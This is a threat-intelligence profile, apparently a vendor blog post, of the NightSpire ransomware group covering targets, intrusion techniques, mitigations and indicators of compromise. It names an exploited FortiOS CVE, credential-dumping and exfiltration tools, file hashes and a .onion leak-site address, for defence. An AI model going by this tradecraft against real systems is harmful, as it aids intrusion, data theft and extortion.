Dark Web Profile: NightSpire Ransomware

NightSpire is a financially motivated ransomware group that emerged in early 2025. The group employs a double extortion strategy, encrypting victims’ data and threatening to publish it on their Dark Web Data Leak Site (DLS) if ransoms are not paid. Their operations are marked by wide targeting of organizations across multiple sectors and countries.

NightSpire Ransomware, DLS

Who is NightSpire Ransomware?

NightSpire, a financially driven ransomware group, surfaced in early 2025, focusing on small to medium-sized enterprises across multiple industries for opportunistic exploitation. Initially centered on data theft and extortion, the group has shifted to a double extortion strategy, encrypting data after exfiltration, as seen in recent incidents.

Threat actor card for NightSpire Ransomware

Since March 12, 2025, the group has operated a Dark Web DLS to threaten the release of stolen sensitive data.

NightSpire Ransomware, About Us

What are NightSpire Ransomware’s Targets?

NightSpire’s operations are global in scope. The group does not appear to focus on a specific country or region, instead choosing victims based on exposed vulnerabilities and lack of cyber hygiene. The United States is the most targeted country, followed by Taiwan, Hong Kong, Egypt, and several European nations. Other affected countries include India, Japan, France, Spain, and Poland. The geographical spread suggests a non-geopolitical motive, with a primary focus on financially motivated attacks against soft targets.

The most targeted countries by NightSpire Ransomware

NightSpire’s targets span a wide range of sectors. Analysis of 55 alleged victims reveals that the most frequently attacked industries include Technology, IT Services, Financial Services, Manufacturing, Construction, and Education. Retail, Healthcare, and Public Administration are also represented. The group demonstrates no strong preference for a specific sector, which is consistent with its opportunistic nature.

The most targeted industries by NightSpire Ransomware

This distribution aligns with global ransomware trends, where attackers often exploit under-defended SMBs across critical service sectors.

NightSpire has major claims about Taiwanese government and a hospital

The majority of NightSpire’s victims are small to medium-sized enterprises (SMEs), many with fewer than 1,000 employees. These organizations are often less equipped to defend against sophisticated ransomware operations due to limited cybersecurity resources, outdated infrastructure, and inconsistent patching practices. However, they also can target up high into governmental institutions.

What are NightSpire Ransomware’s Techniques?

NightSpire operates using a blend of traditional ransomware tactics and modern double extortion strategies. The group typically begins by exploiting public-facing vulnerabilities in systems such as VPN appliances, firewalls, or unpatched web servers. Notably CVE-2024-55591, a FortiOS zero-day discovered in late 2024. Successful exploits allow the group to elevate privileges, frequently gaining super-admin rights, and navigate laterally through internal systems.

Once inside the network, NightSpire moves laterally using legitimate tools such as PowerShell, PsExec, and Windows Management Instrumentation (WMI). These living-off-the-land techniques (LOLBins) help avoid early detection. The group escalates privileges, dumps credentials using tools like Mimikatz, and maps out the Active Directory environment to gain control over key systems.

A crucial part of their operation is data exfiltration. Before deploying ransomware, the group packages sensitive files into encrypted archives and transfers them to attacker-controlled infrastructure using utilities such as Rclone or MEGA. The stolen data is used as leverage in ransom negotiations.

Communication with victims takes place over relatively secure platforms such as ProtonMail, Telegram, or custom Dark Web chat portals. NightSpire uses intimidation tactics, urgent deadlines, and staged data releases to pressure victims. They often offer to delete stolen data or provide proof of decryption as negotiation incentives.

Basic flow of a NightSpire Ransomware attack

In summary, NightSpire’s operations follow a streamlined, opportunistic model: gain access, move laterally, steal data, encrypt systems, and extort. Their reliance on known exploits and publicly available tools makes them dangerous yet predictable, especially for organizations that lag behind in patching and monitoring. Their tactics emphasize speed, stealth, and psychological pressure rather than advanced custom malware.

What are the Mitigation Tactics Against NightSpire Ransomware?

1. Patch Public-Facing Systems Promptly
   Apply security updates to firewalls, VPNs, and other exposed services, especially Fortinet devices vulnerable to CVE-2024-55591. Maintain an inventory of internet-facing assets and validate they are actively monitored and patched.
2. Harden Remote Access
   Disable unused RDP services. Enforce strong, unique passwords and Multi-Factor Authentication (MFA) for all remote access.
3. Limit Lateral Movement
   Implement least privilege access. Monitor for unusual use of PowerShell, PsExec, or WMI. Use Endpoint Detection and Response (EDR) tools to flag living-off-the-land techniques.
4. Credential Protection
   Prevent credential dumping by enforcing LSASS protection and deploying security solutions that monitor for Mimikatz and similar tools. Isolate domain controllers and apply local admin restrictions.
5. Network Segmentation
   Use network segmentation to contain intrusions and prevent attackers from reaching key infrastructure such as Active Directory, file shares, and backup systems.
6. Monitor for Exfiltration Tools
   Monitor endpoints and network traffic for signs of Rclone, MEGA clients, or other common exfiltration tools. Block unauthorized cloud storage access at the firewall or proxy layer.
7. Backup and Recovery
   Maintain offline, immutable backups. Test backup restoration regularly. Ensure backups are segmented from the rest of the network and cannot be accessed via the same credentials.
8. Incident Response Plan
   Prepare for a ransomware scenario with a tested incident response plan. Include contact protocols, legal review, and public response procedures.
9. Encrypt Internal Data and Monitor Access
   Encrypt sensitive data at rest. Monitor for large-volume access or movement of files that may indicate exfiltration or staging.
10. Threat Intelligence and IoC Monitoring
    Monitor for known NightSpire Indicators of Compromise (IoCs) shared by KPMG:

• File Hashes:
  • 0170601e27117e9639851a969240b959
  • 7a4aee1910b84c6715c465277229740dfc73fa39
  • 35cefe4bc4a98ad73dda4444c700aac9f749efde8f9de6a643a57a5b605bd4e7
• Data Leak Site:
  • a2lyiiaq4n74tlgz4fk3ft4akolapfrzk772dk24iq32cznjsmzpanqd[.]onion

Use these IoCs in SIEM and threat detection systems to identify ongoing or past activity.

How Can SOCRadar Help?

NightSpire is a rising ransomware group known for exploiting public-facing vulnerabilities, stealing data, and using double extortion tactics. SOCRadar provides targeted solutions to help organizations detect and stop these threats early.

Extended Threat Intelligence

SOCRadar delivers real-time insights into NightSpire’s tactics, techniques, and procedures (TTPs). This allows organizations to stay ahead of evolving attack patterns, including the use of vulnerabilities like CVE-2024-55591.

Vulnerability Intelligence & Risk Prioritization

NightSpire exploits known vulnerabilities. SOCRadar helps identify and prioritize these risks, enabling security teams to patch the most critical issues before they’re used in an attack.

SOCRadar’s Vulnerability Intelligence

External Attack Surface Management

NightSpire often targets exposed or misconfigured systems. SOCRadar maps internet-facing assets in real time, helping organizations discover and secure shadow IT and reduce their attack surface.

SOCRadar Attack Surface Management

Ransomware Intelligence Dashboard

SOCRadar consolidates global ransomware activity into a single dashboard. Security teams can monitor NightSpire’s campaigns, victim profiles, and infrastructure for better response planning.

In Conclusion

NightSpire represents a typical modern ransomware threat actor, technically capable, financially motivated, and operationally flexible. Their targeting across industries and regions suggests that they are not guided by ideology but by opportunity and profitability. Organizations should view them as a serious threat and implement proactive defenses including regular vulnerability management, employee awareness training, segmentation of networks, and well-rehearsed incident response plans. The group’s continued activity underscores the importance of maintaining fundamental cybersecurity practices and preparing for worst-case ransomware scenarios.

What are the MITRE ATT&CK TTPs of NightSpire Ransomware?